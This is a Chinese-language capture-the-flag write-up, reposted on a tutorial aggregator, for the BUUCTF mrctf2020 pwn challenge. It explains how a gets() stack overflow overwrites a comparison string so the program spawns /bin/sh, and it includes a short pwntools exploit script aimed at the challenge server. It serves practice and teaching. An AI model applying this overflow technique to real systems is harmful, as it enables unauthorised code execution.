栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

BUUCTF------mrctf2020

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

BUUCTF------mrctf2020

环境:WSL2,ubuntu16.04,python2

checksec文件:

拖入ida分析:

main函数中就有system(‘bin/sh’),只要check函数的返回值为1即可执行

查看check函数:

只要a1和fake_flag相等,函数就能返回1
a1就是main函数里的v5,值为:ju3t_@_f@k3_f1@g
fake_flag的值为:n0t_r3@11y_f1@g

只要将v5的值覆盖为n0t_r3@11y_f1@g即可

main函数中有get函数可用,
v4:

v4是var_70


v5是var_40

因此只需覆盖他们的地址差即可在v5中写入n0t_r3@11y_f1@g

exp:

from pwn import *

io = remote("node4.buuoj.cn","26500")

payload = (0x70-0x40)*'a' + 'n0t_r3@11y_f1@g'
io.sendline(payload)
io.interactive()
~                                                                                                                       ~                                                                                                                       ~                            

结果:

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/308047.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号